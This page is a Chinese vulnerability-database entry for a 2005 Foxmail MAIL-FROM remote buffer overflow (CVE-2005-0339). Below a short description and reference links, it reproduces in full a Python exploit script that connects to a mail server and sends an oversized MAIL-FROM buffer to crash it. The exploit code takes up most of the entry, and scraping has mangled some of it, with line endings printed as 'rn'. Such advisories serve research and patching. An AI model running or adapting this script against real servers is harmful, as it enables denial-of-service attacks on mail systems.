Foxmail MAIL-FROM远程缓冲区溢出漏洞

Foxmail MAIL-FROM远程缓冲区溢出漏洞

漏洞ID 1108437 漏洞类型 缓冲区溢出
发布时间 2005-02-07 更新时间 2005-10-20
图片[1]-Foxmail MAIL-FROM远程缓冲区溢出漏洞-安全小百科CVE编号 CVE-2005-0339
图片[2]-Foxmail MAIL-FROM远程缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200505-165
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/797
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-165
|漏洞详情
Foxmail2.0中的缓冲区溢出漏洞,允许远程攻击者通过较长的MAILFROM命令来引起拒绝服务攻击以及可能执行任意代码。
|漏洞EXP
#!/usr/bin/python
#Code by OYXin
#oyxin_at_segfault.cn
import socket
import sys
import getopt


def usage():
    print "Usage: foxserver.py -h host -p port"
    sys.exit(0)
    
if __name__ == '__main__':
    
    try: 
        opts, args = getopt.getopt(sys.argv[1:], "h:p:") 
    except getopt.GetoptError, msg: 
        print msg
        usage()
        
    for o,a in opts:
        if o in ["-h"]:
            host = a
        if o in ["-p"]:
            port = int(a)

    evilbuf =  "MAIL-FROM: <" + "A"*5000 + ">" + "rn"
    evilbuf += "RCPT-TO: [email protected]" + "rn"
    evilbuf += "Message-ID: 123" + "rn"
    evilbuf += "ASDF" + "rn"
    evilbuf += "." + "rn"
    evilbuf += "QUIT" + "rn"
    try:
        sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sockfd.connect((host, port))
        recvbuf = sockfd.recv(1024)
        print `recvbuf`
        sockfd.send("HELO localhostrn")
        recvbuf = sockfd.recv(1024)
        print `recvbuf`
        sockfd.send(evilbuf)
    except socket.error, msg:
        print msg
        
    sockfd.close()

# milw0rm.com [2005-02-07]
|参考资料

来源:XF
名称:foxmail-mailfrom-bo(19229)
链接:http://xforce.iss.net/xforce/xfdb/19229
来源:BID
名称:12454
链接:http://www.securityfocus.com/bid/12454
来源:BUGTRAQ
名称:20050205FoxmailServerRemoteBufferOverflowVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110763204301080&w;=2

相关推荐: SGI IRIX CPR Buffer Overflow Vulnerability

SGI IRIX CPR Buffer Overflow Vulnerability 漏洞ID 1102096 漏洞类型 Boundary Condition Error 发布时间 2002-04-30 更新时间 2002-04-30 CVE编号 N/A CN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享